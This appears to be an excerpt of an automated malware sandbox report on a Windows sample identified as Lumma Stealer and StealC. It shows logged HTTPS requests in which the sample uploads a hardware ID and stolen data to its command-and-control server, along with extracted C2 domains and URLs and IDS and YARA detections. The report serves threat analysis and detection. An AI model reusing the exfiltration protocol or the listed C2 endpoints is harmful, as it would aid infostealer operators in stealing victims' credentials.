2024-11-08 14:20:44 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1238 Host: navygenerayk.store
2024-11-08 14:20:44 UTC	1238	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 43 46 44 34 44 39 44 41 32 37 30 46 32 41 31 32 43 31 31 34 37 37 38 46 46 34 38 30 44 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"ECFD4D9DA270F2A12C114778FF480D6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-11-08 14:20:45 UTC	1018	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4al129bacjocb30sj27m93p9dp; expires=Tue, 04-Mar-2025 08:07:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVRbbzp9xPBIUHfBFLhVLb5GiyiECv3jsVZlwTCa6ZzAzN8IePdfn7kyEbuaOd5V2hW8Qf2Mo%2BThcuQp6ECpr1glmcmJ%2B2PZWzyeL%2FAkSMIx051lxb%2BOIhS9cGxPPxahfIs%2FLK4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df6349c3eeb3583-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1469&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2157&delivery_rate=1169156&cwnd=251&unsent_bytes=0&cid=1df7cdbfc67bf3d3&ts=508&x=0"
2024-11-08 14:20:45 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-11-08 14:20:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49782	188.114.97.3	443	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 14:20:46 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 583761 Host: navygenerayk.store
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 43 46 44 34 44 39 44 41 32 37 30 46 32 41 31 32 43 31 31 34 37 37 38 46 46 34 38 30 44 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"ECFD4D9DA270F2A12C114778FF480D6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: 44 4d 09 80 b8 00 cc af d2 5b de a8 30 d5 78 40 b3 3c 56 0d d7 8a 31 3d 8f 56 95 de f5 ed c0 9b 9b bb da 93 dc 46 10 95 56 b1 9d 5d bf 0b 4c ad 79 fd 6f df d0 aa 16 16 76 08 c0 51 35 00 95 1b 75 b7 82 08 18 2e 20 01 8c f0 ad 88 1e 88 44 d2 be d0 e7 89 24 a6 d2 da b6 83 16 46 42 77 ee 41 c8 71 02 78 56 4d bf 01 5a 4b 37 a7 2e ab 02 4d fb aa 06 82 98 51 92 c8 74 0d 0f 93 0a 61 5e ac e6 44 43 99 7f 94 46 b8 5d 2e ac 40 5e a9 f5 f0 e2 20 51 73 73 c5 5f f3 a9 81 e3 7c 03 ec 86 99 50 eb 86 c7 71 ed c5 d9 58 58 7b d1 2c a7 70 6f c2 db dd 34 f6 f8 94 41 a5 f8 64 b1 f4 8a 2f 33 22 63 b6 ae 37 9e e3 74 97 ab 15 08 06 a1 42 e0 72 6b 43 46 4e 33 ba fd 39 dc c1 3d 7c 10 bc 71 26 d2 67 0d 02 66 7f ea 0e 66 4e d3 09 48 37 e1 bd 5d e9 b2 22 cd 32 74 9e de a6 7a c7 87 47 Data Ascii: DM[0x@<V1=VFV]LyovQ5u. D$FBwAqxVMZK7.MQta^DCF].@^ Qss_\|PqXX{,po4Ad/3"c7tBrkCFN39=\|q&gffNH7]"2tzG
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: 83 a0 e0 fa 68 6c d3 17 f0 52 28 98 d4 c5 37 a6 f2 cd 59 e6 75 4d 69 97 5e 8d b1 6e 0e 02 61 a5 83 14 43 4c ea 83 0b f1 18 96 40 e7 d3 1f cb b2 09 8f aa f5 ff 00 17 47 fc ad 3a 8b 57 af a3 37 9f 95 10 a1 0d 3c 7b df 47 bb 44 4e fc 80 94 75 50 58 40 d4 da 87 ef 77 0e 07 7e 96 5f f9 1e 40 43 ef eb 2f 55 90 28 dc 8a df 2b 1d 06 df 1b 91 ee 0d b1 cc 0c 9c e4 b5 58 7b 17 64 f6 77 82 68 bd 1f b5 47 fe fc ee 06 f6 68 37 a3 a7 99 a1 e4 36 da 37 c7 e5 b5 b5 cc 28 9b cc 2e 6b de da 14 ae f2 f0 ea 0d 88 bd 52 ec 7d f3 3b 98 eb 4e 0c 1a 51 7c ee 13 ae e3 5e af 35 53 3c 14 c3 c5 9c e5 d8 9f 3c 5d e9 13 b3 bf c6 c2 fb 80 67 47 c4 31 9b 35 43 eb f2 7e fc 94 cc 48 37 66 78 af e4 c3 d9 df cb 2b d7 67 a6 1d 9b 33 ab ab 46 cf 70 9d 65 76 3b 56 08 9f bd 77 a7 93 43 e1 e0 f3 Data Ascii: hlR(7YuMi^naCL@G:W7<{GDNuPX@w~_@C/U(+X{dwhGh767(.kR};NQ\|^5S<<]gG15C~H7fx+g3Fpev;VwC
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: 9f 6b 42 20 b2 2c 8a b1 37 42 70 dc 19 d3 dc c3 09 33 9c 38 89 9b a4 8f 20 49 5c f2 99 10 29 bc 60 39 7a 3d 65 67 e9 e9 cb cf 1e 6c d4 cb e7 47 62 1c be 2b 07 d6 08 e2 f5 78 f8 72 8d da cf 11 19 00 74 53 3e 11 18 d2 d8 89 51 4f da a0 95 7b 13 63 3b 6f 7e 49 a0 43 bd ad 23 be 12 8b 08 21 91 3e b7 41 ac e5 6a e6 5e 0c 5e 68 d2 99 4d 6e df 7a 1b 6c b4 e9 2b a5 a4 57 e0 11 5b b3 c6 a8 fc 3a 2e a3 ef ed 5e a5 62 b1 32 7c 32 b8 86 d9 e8 de a4 26 fe 1e 81 25 4a ed 79 76 48 84 0c 70 92 3b a1 b4 e7 2d 9c f8 35 fa 90 d3 9a 10 d5 a1 ad 08 4e 22 11 ad ac 67 1d 75 b6 1e 1c 3d c5 5e 04 09 e3 b8 5f f2 96 41 19 2a fb c9 3d bd 91 07 3f 98 e5 0e 25 3f 25 91 32 b9 80 22 4a e2 09 28 94 14 d1 e0 6b c4 7e 39 ea f1 b1 49 04 b8 22 e1 87 9b f5 70 0a 20 07 5b d8 fd 35 21 24 33 8d Data Ascii: kB ,7Bp38 I\)`9z=eglGb+xrtS>QO{c;o~IC#!>Aj^^hMnzl+W[:.^b2\|2&%JyvHp;-5N"gu=^_A*=?%?%2"J(k~9I"p [5!$3
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: 70 70 98 03 2f 1c 1a 28 b6 53 ac a4 1f 8c 74 82 00 6f 13 2c a5 74 73 cc d3 fc e0 7d c2 69 3f b3 81 c3 84 a6 b0 27 00 1b 92 d6 41 77 18 40 0e 13 5d d7 8a 01 26 fd de a0 7f bc 36 2f fc ee 79 95 0f 8b 7a a1 7a e8 84 82 07 b3 7c 47 dc d8 af a3 72 dc aa 85 d8 a0 93 96 e4 6c 25 fd 14 7a b6 cb eb d7 a1 1f 1d 2e 89 07 b1 af 63 56 7a 58 59 66 b3 34 6b 5a 10 7c 3d 1d fe 41 1a bd 4e 85 27 47 de cb 5e a3 a1 36 05 56 cb 5e 13 e5 26 1d 78 51 29 44 a5 37 31 65 41 7e 7a c7 ad e1 06 4e e9 af 82 3b 21 a8 e5 28 79 3c b6 97 97 c3 71 ef de 2f da 9e bc 9d 14 d4 d8 77 f8 8e bc cd 9a 72 ad 94 13 43 10 82 ef 80 4c 0e e3 c5 61 87 e1 df 40 42 a1 49 8a df 20 3c 6f 2e b9 27 7b af 77 27 fb e9 cd 88 87 b4 d7 a5 5f 97 c3 ce c8 94 3a c1 0a 23 48 17 dd f1 90 00 a1 65 5e 10 39 05 ff 54 ca Data Ascii: pp/(Sto,ts}i?'Aw@]&6/yzz\|Grl%z.cVzXYf4kZ\|=AN'G^6V^&xQ)D71eA~zN;!(y<q/wrCLa@BI <o.'{w'_:#He^9T
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: 85 48 e5 8b d2 79 21 cb 28 56 f6 d4 f0 65 9e 64 fc 08 a4 54 7c 84 45 5a 70 d7 4a 63 c9 2c cb e1 65 f3 77 e6 49 68 3c 2a 4c 8b 17 87 4b 52 36 95 ca 08 d7 6b 61 2d 3d f4 65 58 31 60 f5 9f 66 37 02 9a 12 8f ee 10 8e d5 a4 24 c9 33 f1 7c a7 89 89 ad 3e 5b 33 d5 8b 7d bd 45 74 4e 19 6a 6a 8f e0 8b 43 b1 ce e8 48 b5 d9 bc 29 37 d1 62 5f b6 f7 79 a6 e7 0c 0d 80 d9 9b 37 87 d9 0f 3c de cf 39 d8 24 90 44 54 2e aa 4e fe 60 af 17 d3 1f c1 86 08 54 3b cd 34 a5 3a 9d d3 2b 6e b1 21 5f 68 21 20 8c a0 20 81 75 68 b9 af 32 54 ed 97 eb 38 55 0a 93 62 85 fa 3d 7c 92 53 2b 8a 92 fa 45 50 8e 8e d1 64 51 3c 7c 78 10 fb 73 47 26 7f 3c 9e d8 d4 10 ea fe 2d 26 8a 12 ba 98 e1 c5 a2 a5 7c 5c 85 19 d0 ca 42 52 97 51 ee aa 00 94 94 9d 18 ea 28 03 89 12 03 44 17 47 3e f7 17 92 f2 d1 Data Ascii: Hy!(VedT\|EZpJc,ewIh<*LKR6ka-=eX1`f7$3\|>[3}EtNjjCH)7b_y7<9$DT.N`T;4:+n!_h! uh2T8Ub=\|S+EPdQ<\|xsG&<-&\|\BRQ(DG>
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: 1b 2e ea 8b ca 18 cd b0 8a 92 d9 40 17 3d c6 00 a7 88 fe 00 92 f0 5c de cc d5 5b c0 f6 a0 55 7b f5 16 e2 d1 6b 9a 69 1c a1 73 6c ea bb 9e 67 94 7c 12 ce 6c 34 53 91 cb 8b b8 5c 1f a3 72 a1 06 45 f1 d9 d5 cc 3d 96 64 6a 1f 16 70 eb 6a 8a 33 df 32 f7 fe ed fc 64 15 84 ea ef 3c 62 d2 14 df e1 3b 7c 42 d7 6d 30 07 6d ff 57 c3 b4 96 12 ad 7c 87 ff fc 04 6e cd 93 ae cd 9b d9 25 a6 32 34 6b d8 77 56 8e ad 66 11 fa 3c f2 89 8b 4d 92 d7 79 0c 29 6c f5 ea ef 97 b1 d0 3c 58 02 6b bd 88 7c 9c a9 7e 86 22 3a ab c3 b4 07 d0 97 c5 d3 2d 30 8d 1a 4a 90 e4 a6 67 ab 0a 2a a8 e0 80 24 ad 8d 4a 90 25 5a e5 e6 3b 02 8a d3 37 0e 7d 3d 09 ce ec b0 fe 4d c0 97 33 2f bb 40 e9 02 cc 1d 7f d4 c1 c8 97 5e a4 89 ed 56 5d c3 b4 7d 06 fd c7 34 35 34 f8 d2 bf 9b 0b 03 53 2d f4 2f 23 4c Data Ascii: .@=\[U{kislg\|l4S\rE=djpj32d<b;\|Bm0mW\|n%24kwVf<My)l<Xk\|~":-0Jg*$J%Z;7}=M3/@^V]}454S-/#L
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: f7 ac 1d 0d fa 0c 18 00 d3 04 9f c4 1d 8f fd 2c cf 0b 14 d0 92 25 d8 bf 7c f7 08 8c e8 6d a3 05 0a 8c 90 9e 5f 28 9a ad 82 84 7c eb a8 a0 10 18 74 c9 b6 e0 a9 18 cd 25 ff e5 1d 50 a0 8c 49 f2 e7 df 04 a0 44 a2 e1 c3 7f ff c9 db 9f 8f ae e4 39 44 41 d8 ae a3 ad ba dc 97 aa 58 41 0c 8c 5b f6 ce 9b aa d0 3c 67 28 df 01 d5 1d 93 1e eb 4c b9 a9 56 5b ee 40 e9 91 4d 42 3c 30 d8 42 ef d7 d7 6c 8c e2 e1 38 98 97 05 e9 a5 a8 8c 73 b8 c6 0c d1 e3 ee 4b 94 0c 43 1c ac 6e 03 20 5a a9 f7 ec 81 ad 1c f7 77 88 24 58 9d c2 f2 dd 31 22 b1 e9 21 70 56 d7 7e d2 41 fe ab db 31 a3 99 a0 a3 4d f8 62 22 ba cf 8a 6e f7 53 c9 33 b3 21 25 2a 50 8c 73 db b1 c0 45 1d d7 ed 10 19 05 19 32 db 2d 29 d6 0b b5 a4 e9 13 e0 a4 d8 fa 4f 93 7f 11 bf d4 90 a7 f3 f0 b0 88 fa 73 6a 4a bb cf e2 Data Ascii: ,%\|m_(\|t%PID9DAXA[<g(LV[@MB<0Bl8sKCn Zw$X1"!pV~A1Mb"nS3!%*PsE2-)OsjJ
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: 3c 80 2e 89 10 2a 76 a6 d7 bb 92 b4 7a 79 82 d7 87 18 27 98 33 c8 73 6b a8 08 29 91 3b 6a a4 24 31 19 6b fc d1 1d 9e b0 ca ad 5f 89 c9 84 d7 5d c4 8e e3 af bb c3 e3 e3 4d 93 11 ab 30 70 87 1f 43 49 6b 13 6a 30 89 5b 1f 30 c7 c2 09 71 2c 71 30 ee 72 9d e1 68 fd 5b c9 8f 25 86 0c b8 c7 39 87 84 4a 85 f5 1b 42 c6 88 16 37 74 f3 3c 10 a4 47 c2 4b 23 11 d0 c0 ba f5 0b e5 29 70 4d b8 b7 8b 51 a1 9e 5c cf 6f cf 43 8d fc 1c 9e b8 73 51 9b cc 59 83 f9 bb 46 44 8a 35 1c 28 50 4b cf ec b2 51 51 4e 09 e7 99 10 fa 44 91 00 f6 23 c2 d6 fa b8 1f 1f ee 3a d5 1d 71 4b 4d 1b d0 4f 87 e6 c3 97 30 bf 64 f8 6f 55 e6 4b 45 62 37 6f 77 e5 2f 16 79 d5 6c 1a 4f 81 ee b4 8f df da c1 fc de 14 d8 d6 f7 b4 68 d5 c4 74 5f 13 e7 34 a6 bd 0f 6b 20 c1 69 c1 fa b1 e3 5b 65 24 79 48 de ec Data Ascii: <.*vzy'3sk);j$1k_]M0pCIkj0[0q,q0rh[%9JB7t<GK#)pMQ\oCsQYFD5(PKQQND#:qKMO0doUKEb7ow/ylOht_4k i[e$yH
2024-11-08 14:20:46 UTC	15331	OUT	Data Raw: 3d 36 f1 2a 4f e2 26 88 5b c7 91 ea b5 be 7a d7 0e a6 24 25 75 45 45 17 9e ed 96 fc cf 1e ce d1 b2 a9 52 52 a0 0b c8 f0 63 3e 19 15 bd d3 d1 b3 9d 36 29 c2 30 75 b7 e4 36 62 37 6d a4 4d 93 52 8e 92 5f 93 07 0b 51 30 cd bf a6 bf d9 68 83 94 1a c2 51 69 2e 5f 3d 31 e6 b4 79 10 e2 c5 d9 d4 cd ff 30 91 9a b4 26 8d f2 b9 e9 19 59 e0 44 9d 73 9c 7d 27 f5 b0 c8 9f 95 ce 3c 33 b8 78 e8 f3 e5 b5 13 d7 fb cb 9d 7d a6 e6 0e f4 bc 73 f6 8e 0f d9 e4 68 96 ea 2a ea 35 97 ff 65 da f5 d5 c5 56 4c ee e7 ac a0 3e 4f fc c8 0b 0e eb f7 5c eb d7 ed eb 7c b0 23 38 6d 7a 20 f4 f7 a9 bc b6 be f3 d6 69 b3 03 e1 eb bd b3 33 6e 15 c3 03 c1 a3 a5 b3 69 6e 2d 3e b4 15 eb 16 ab 9d 5d 83 f6 d1 dd 73 bd 5e 95 6d a2 e0 fa 0c 12 54 70 d6 a7 ae cf f4 7c 9a bd b9 e3 29 d5 57 52 63 8a 47 c9 Data Ascii: =6O&[z$%uEERRc>6)0u6b7mMR_Q0hQi._=1y0&YDs}'<3x}sh5eVL>O\\|#8mz i3nin->]s^mTp\|)WRcG
2024-11-08 14:20:48 UTC	1021	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ukvq8ga0la62v64trop9c5mk8o; expires=Tue, 04-Mar-2025 08:07:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eykPK6GJ64i6w5EOybVBk47fHi17UAEpOPOmJ%2FmyiCnXqv2F%2FW0TgeKmUnZSE2cUSBtTg71cBtlxt%2BGQTjvFjhDh6fM6zj0NXFodiqSzSQn271y9QSBaUjACk15yuDUf9LqEsn0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df634a6aacae599-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4827&sent=233&recv=638&lost=0&retrans=0&sent_bytes=2846&recv_bytes=586354&delivery_rate=2726930&cwnd=251&unsent_bytes=0&cid=b2827b4a917a0471&ts=1969&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49793	188.114.97.3	443	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 14:20:49 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: navygenerayk.store
2024-11-08 14:20:49 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 45 43 46 44 34 44 39 44 41 32 37 30 46 32 41 31 32 43 31 31 34 37 37 38 46 46 34 38 30 44 36 42 Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=ECFD4D9DA270F2A12C114778FF480D6B
2024-11-08 14:20:49 UTC	1015	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s2vfqasqu7hvece51to8mr5gcv; expires=Tue, 04-Mar-2025 08:07:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HQ0e7vpmYtSia1%2B2I5Scs4a2n1ILCchpJ4sH4iquOikdrQGJz923rMerFOKyfB%2Fv0M8YIg7DFdDyve5pwnxPd8ld3oxpT1Jx1%2FAqHPyEqoXZ5W0KL%2BnR9nJ3SaRtvJy1Dxx5HnU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df634b75b9f485f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1797&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=989&delivery_rate=1394990&cwnd=251&unsent_bytes=0&cid=e81ab67993a4f2aa&ts=528&x=0"
2024-11-08 14:20:49 UTC	214	IN	Data Raw: 64 30 0d 0a 37 37 31 75 7a 6e 58 67 63 6d 49 45 54 6f 4b 57 79 43 6a 7a 68 6d 72 48 49 58 69 72 53 58 4c 4d 43 2b 65 72 6b 43 68 34 67 4a 43 30 78 6b 79 37 56 39 70 51 43 6e 41 36 38 71 79 55 42 36 2b 70 57 2f 38 55 56 70 6c 34 52 2b 49 36 31 70 69 2b 47 55 37 63 76 35 7a 4a 43 36 38 59 76 46 30 51 5a 53 44 6d 2b 61 55 47 6c 76 34 50 35 51 31 61 7a 54 31 51 39 6a 76 4c 69 66 55 4b 51 72 48 74 77 38 5a 4d 75 31 66 61 55 41 70 77 4f 76 4b 73 6c 41 65 76 71 56 76 2f 46 46 61 5a 65 45 66 69 4f 74 61 59 76 68 6c 4f 33 4c 2b 41 32 77 69 53 57 6f 51 58 42 43 6f 72 2b 76 50 71 42 4e 48 67 48 75 55 62 53 49 64 72 46 2b 34 78 31 74 62 4e 0d 0a Data Ascii: d0771uznXgcmIEToKWyCjzhmrHIXirSXLMC+erkCh4gJC0xky7V9pQCnA68qyUB6+pW/8UVpl4R+I61pi+GU7cv5zJC68YvF0QZSDm+aUGlv4P5Q1azT1Q9jvLifUKQrHtw8ZMu1faUApwOvKslAevqVv/FFaZeEfiOtaYvhlO3L+A2wiSWoQXBCor+vPqBNHgHuUbSIdrF+4x1tbN
2024-11-08 14:20:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:20:32
Start date:	08/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xc0000
File size:	3'204'096 bytes
MD5 hash:	7AC86C152BAC1FB0212A7FF9087A26E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1627798849.00000000064B1000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1564217264.00000000088F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 01426D28 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1433014514.0000000001423000.00000004.00000020.00020000.00000000.sdmp, Offset: 01423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1423000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6447dfe1e206d55cdb0cdfb10001a36b24080828ba4ab032c43b886a83ece0ee
Instruction ID: cfe77d8975f219a6ed662e6f82d8c9e9d73412f8a6234e2c19273cac4526edc4
Opcode Fuzzy Hash: 6447dfe1e206d55cdb0cdfb10001a36b24080828ba4ab032c43b886a83ece0ee
Instruction Fuzzy Hash: CF5174A681EBD05FD3538B305C265917FB1AE17A4830E49DBC0C4CF5B3E129991EC3A2

Source: https://navygenerayk.store/apik	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/g	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/sd	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/w	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/ekT	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/tdg	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/Wi	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/c	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/apih	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/KU	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Tk	Avira URL Cloud: Label: phishing
Source: https://navygenerayk.store/apiF	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/mandconnroutehelper.dll	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/o	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/0	Avira URL Cloud: Label: malware
Source: https://navygenerayk.store/7	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exe4	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/def.exeC	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/~k	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/rosoft	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.64b0000.2.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 0.2.file.exe.c0000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "crisiwarny.store", "fadehairucw.store", "founpiuer.store", "navygenerayk.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}

Source: Malware configuration extractor	URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: scriptyprefej.store

Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.9:58084 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.9:59057 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.9:53505 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.9:52384 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.9:61606 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.9:49771 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.9:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.9:62739 -> 1.1.1.1:53
